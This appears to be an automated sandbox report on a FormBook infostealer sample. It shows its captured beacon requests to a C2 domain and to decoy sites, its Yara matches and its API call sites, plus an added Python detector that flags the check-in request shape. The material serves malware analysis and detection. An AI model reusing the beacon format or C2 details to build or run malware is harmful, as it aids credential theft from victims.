Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1 | Host: www.usinggroovefunnels.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1 | Host: www.cgpizza.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1 | Host: www.physicalrobot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: GD-EMEA-DC-CGN1DE
Source: Joe Sandbox View | ASN Name: ANONYMIZEEpikNetworkCH
Source: unknown | DNS traffic detected: queries for: www.jamessicilia.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 08 Apr 2021 09:10:22 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://www.physicalrobot.com
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://www.physicalrobot.com/
Source: explorer.exe, 00000003.00000000.237042288.000000000F674000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | Strings found in binary or memory (type-foundry URLs carried by loaded font files, not attributable to the sample): http://fontfabrik.com, http://www.apache.org/licenses/LICENSE-2.0, http://www.carterandcone.coml, http://www.fontbureau.com, http://www.fontbureau.com/designers, http://www.fontbureau.com/designers/?, http://www.fontbureau.com/designers/cabarga.htmlN, http://www.fontbureau.com/designers/frere-jones.html, http://www.fontbureau.com/designers8, http://www.fontbureau.com/designers?, http://www.fontbureau.com/designersG, http://www.fonts.com, http://www.founder.com.cn/cn, http://www.founder.com.cn/cn/bThe, http://www.founder.com.cn/cn/cThe, http://www.galapagosdesign.com/DPlease, http://www.galapagosdesign.com/staff/dennis.htm, http://www.goodfont.co.kr, http://www.jiyu-kobo.co.jp/, http://www.sajatypeworks.com, http://www.sakkal.com, http://www.sandoll.co.kr, http://www.tiro.com, http://www.typography.netD, http://www.urwpp.deDPlease, http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_00404EA0
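
The capture above shows what the extracted configuration under "Malware Configuration" means in practice: the bot walked the decoy list and the one real C2 with the same request shape, GET /evpn/?JDK8ix=<long base64-looking blob>&w4=jFNp36Ihu, Connection: close and no User-Agent, and 13 of the 14 hosts it contacted are decoys (unrelated legitimate sites the operator seeded to bury the C2). The script below is an added example, not Joe Sandbox code: it matches requests on that shape and then maps each Host onto the configuration to separate the C2 from the decoys. The shape (one short path segment, one long base64-looking parameter, one short alphanumeric parameter, close, no User-Agent) is generalised from this capture and is an assumption about other campaigns; the parameter names and the /evpn/ path are campaign specific and deliberately not matched. CONFIG_JSON is the report's configuration with the decoy list cut down to the hosts that appear in the capture; SAMPLE_REQUESTS holds three captured requests plus one constructed benign request; function names are mine.

```python
"""Match FormBook-style check-ins and map each Host onto the extracted config.

Added example, not Joe Sandbox code. The request-shape heuristic is an
assumption generalised from this report's capture.
"""
import json
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

# Report configuration, decoy list trimmed to hosts seen in the capture.
CONFIG_JSON = """{"C2 list": ["www.autotrafficbot.com/evpn/"],
 "decoy": ["usinggroovefunnels.com", "kinfet.com", "markmalls.com",
           "theholisticbirthco.com", "physicalrobot.com", "jcernadas.com",
           "tor-one.com", "zhuledao.com", "cgpizza.net", "jamessicilia.com",
           "curiosityisthecurebook.com", "de-knutselkeet.com",
           "productsoffholland.com"]}"""

Request = Tuple[str, Dict[str, str]]  # (request line, headers)
SAMPLE_REQUESTS: List[Request] = [
    ("GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1",
     {"Host": "www.jamessicilia.com", "Connection": "close"}),
    ("GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1",
     {"Host": "www.autotrafficbot.com", "Connection": "close"}),
    ("GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1",
     {"Host": "www.cgpizza.net", "Connection": "close"}),
    ("GET /index.html?lang=en&ref=home HTTP/1.1",  # constructed benign request
     {"Host": "www.example.com", "Connection": "keep-alive", "User-Agent": "Mozilla/5.0"}),
]

SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def is_formbook_checkin(request_line: str, headers: Dict[str, str]) -> bool:
    """Shape check only: independent of domain, path name and parameter names."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return False
    url = urlsplit(parts[1])
    if not SHORT_PATH.match(url.path):
        return False
    # Split the query by hand: parse_qsl would turn the '+' inside the
    # base64 blob into a space and break the character-class check.
    params = [kv.split("=", 1) for kv in url.query.split("&")]
    if len(params) != 2 or any(len(kv) != 2 for kv in params):
        return False
    (_, blob), (_, tag) = params
    hdrs = {k.lower(): v.lower() for k, v in headers.items()}
    return (BASE64ISH.match(blob) is not None
            and 4 <= len(tag) <= 12 and tag.isalnum()
            and hdrs.get("connection") == "close"
            and "user-agent" not in hdrs)


def _bare(host: str) -> str:
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def load_config(config_json: str) -> Dict[str, Set[str]]:
    """Reduce the extractor's JSON to two host sets, C2 and decoy."""
    cfg = json.loads(config_json)
    c2 = {_bare(urlsplit("//" + u).hostname or "") for u in cfg["C2 list"]}
    return {"c2": c2, "decoy": {_bare(d) for d in cfg["decoy"]}}


def classify_host(host: str, config: Dict[str, Set[str]]) -> str:
    bare = _bare(host)
    if bare in config["c2"]:
        return "c2"
    if bare in config["decoy"]:
        return "decoy"
    return "unknown"


def triage(requests: List[Request], config: Dict[str, Set[str]]) -> List[Dict[str, str]]:
    """One row per request that matches the check-in shape."""
    rows = []
    for line, hdrs in requests:
        if is_formbook_checkin(line, hdrs):
            host = hdrs.get("Host", "")
            rows.append({"host": host, "verdict": classify_host(host, config)})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_REQUESTS, load_config(CONFIG_JSON)):
        print(row)
```

Two practical consequences follow from the output. Blocking the decoy hosts buys nothing and breaks legitimate sites, so only the C2 entry belongs on a blocklist; the request shape is the durable hunt, and it is also what the three ET rules (2031412, 2031449, 2031453) fired on above. And a beacon to a host that the shape check flags but the configuration calls "unknown" is worth a look, since it would mean a configuration the extractor did not see.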

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same eight memory dumps and six unpacked PEs listed under "Yara detected FormBook" in AV Detection above.

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004181C0 NtCreateFile, | 1_2_004181C0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00418270 NtReadFile, | 1_2_00418270
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004182F0 NtClose, | 1_2_004182F0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory, | 1_2_004183A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00418272 NtReadFile, | 1_2_00418272
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk, | 1_2_00AB98F0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk, | 1_2_00AB9860
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk, | 1_2_00AB9840
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk, | 1_2_00AB99A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk, | 1_2_00AB9910
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk, | 1_2_00AB9A20
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk, | 1_2_00AB9A00
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk, | 1_2_00AB9A50
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB95D0 NtClose,LdrInitializeThunk, | 1_2_00AB95D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk, | 1_2_00AB9540
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk, | 1_2_00AB96E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk, | 1_2_00AB9660
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk, | 1_2_00AB97A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk, | 1_2_00AB9780
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk, | 1_2_00AB9FE0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk, | 1_2_00AB9710
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB98A0 NtWriteVirtualMemory, | 1_2_00AB98A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9820 NtEnumerateKey, | 1_2_00AB9820
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABB040 NtSuspendThread, | 1_2_00ABB040
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB99D0 NtCreateProcessEx, | 1_2_00AB99D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9950 NtQueueApcThread, | 1_2_00AB9950
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A80 NtOpenDirectoryObject, | 1_2_00AB9A80
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A10 NtQuerySection, | 1_2_00AB9A10
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA3B0 NtGetContextThread, | 1_2_00ABA3B0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9B00 NtSetValueKey, | 1_2_00AB9B00
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB95F0 NtQueryInformationFile, | 1_2_00AB95F0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9520 NtWaitForSingleObject, | 1_2_00AB9520
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABAD30 NtSetContextThread, | 1_2_00ABAD30
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9560 NtWriteFile, | 1_2_00AB9560
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB96D0 NtCreateKey, | 1_2_00AB96D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9610 NtEnumerateValueKey, | 1_2_00AB9610
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9670 NtQueryInformationProcess, | 1_2_00AB9670
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9650 NtQueryValueKey, | 1_2_00AB9650
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9730 NtQueryVirtualMemory, | 1_2_00AB9730
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA710 NtOpenProcessToken, | 1_2_00ABA710
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9760 NtOpenProcess, | 1_2_00AB9760
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9770 NtSetInformationFile, | 1_2_00AB9770
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA770 NtOpenThread, | 1_2_00ABA770
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004181C0 NtCreateFile, | 1_1_004181C0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00418270 NtReadFile, | 1_1_00418270
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004182F0 NtClose, | 1_1_004182F0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004183A0 NtAllocateVirtualMemory, | 1_1_004183A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00418272 NtReadFile, | 1_1_00418272
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629540 NtReadFile,LdrInitializeThunk, | 4_2_04629540
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046295D0 NtClose,LdrInitializeThunk, | 4_2_046295D0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk, | 4_2_04629660
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629650 NtQueryValueKey,LdrInitializeThunk, | 4_2_04629650
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk, | 4_2_046296E0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046296D0 NtCreateKey,LdrInitializeThunk, | 4_2_046296D0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629710 NtQueryInformationToken,LdrInitializeThunk, | 4_2_04629710
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629FE0 NtCreateMutant,LdrInitializeThunk, | 4_2_04629FE0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629780 NtMapViewOfSection,LdrInitializeThunk, | 4_2_04629780
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629860 NtQuerySystemInformation,LdrInitializeThunk, | 4_2_04629860
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629840 NtDelayExecution,LdrInitializeThunk, | 4_2_04629840
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk, | 4_2_04629910
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046299A0 NtCreateSection,LdrInitializeThunk, | 4_2_046299A0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A50 NtCreateFile,LdrInitializeThunk, | 4_2_04629A50
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629560 NtWriteFile, | 4_2_04629560
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629520 NtWaitForSingleObject, | 4_2_04629520
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462AD30 NtSetContextThread, | 4_2_0462AD30
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046295F0 NtQueryInformationFile, | 4_2_046295F0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629670 NtQueryInformationProcess, | 4_2_04629670
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629610 NtEnumerateValueKey, | 4_2_04629610
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629760 NtOpenProcess, | 4_2_04629760
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A770 NtOpenThread, | 4_2_0462A770
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629770 NtSetInformationFile, | 4_2_04629770
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629730 NtQueryVirtualMemory, | 4_2_04629730
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A710 NtOpenProcessToken, | 4_2_0462A710
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046297A0 NtUnmapViewOfSection, | 4_2_046297A0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462B040 NtSuspendThread, | 4_2_0462B040
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629820 NtEnumerateKey, | 4_2_04629820
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046298F0 NtReadVirtualMemory, | 4_2_046298F0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046298A0 NtWriteVirtualMemory, | 4_2_046298A0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629950 NtQueueApcThread, | 4_2_04629950
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046299D0 NtCreateProcessEx, | 4_2_046299D0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A20 NtResumeThread, | 4_2_04629A20
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A00 NtProtectVirtualMemory, | 4_2_04629A00
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A10 NtQuerySection, | 4_2_04629A10
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A80 NtOpenDirectoryObject, | 4_2_04629A80
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629B00 NtSetValueKey, | 4_2_04629B00
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A3B0 NtGetContextThread, | 4_2_0462A3B0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004181C0 NtCreateFile, | 4_2_004181C0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00418270 NtReadFile, | 4_2_00418270
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004182F0 NtClose, | 4_2_004182F0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004183A0 NtAllocateVirtualMemory, | 4_2_004183A0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00418272 NtReadFile, | 4_2_00418272
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, | 0_2_0040314A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004046A7 | 0_2_004046A7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00401030 | 1_2_00401030
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00408C5B | 1_2_00408C5B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00408C60 | 1_2_00408C60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B569 | 1_2_0041B569
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041BD6A | 1_2_0041BD6A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402D87 | 1_2_00402D87
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402D90 | 1_2_00402D90
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041CEAF | 1_2_0041CEAF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402FB0 | 1_2_00402FB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B7B5 | 1_2_0041B7B5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 | 1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B420A8 | 1_2_00B420A8
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B090 | 1_2_00A8B090
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B428EC | 1_2_00B428EC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B4E824 | 1_2_00B4E824
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31002 | 1_2_00B31002
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 | 1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7F900 | 1_2_00A7F900
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B422AE | 1_2_00B422AE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAEBB0 | 1_2_00AAEBB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3DBD2 | 1_2_00B3DBD2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B303DA | 1_2_00B303DA
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B42B28 | 1_2_00B42B28
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8841F | 1_2_00A8841F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3D466 | 1_2_00B3D466
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2581 | 1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8D5E0 | 1_2_00A8D5E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B425DD | 1_2_00B425DD
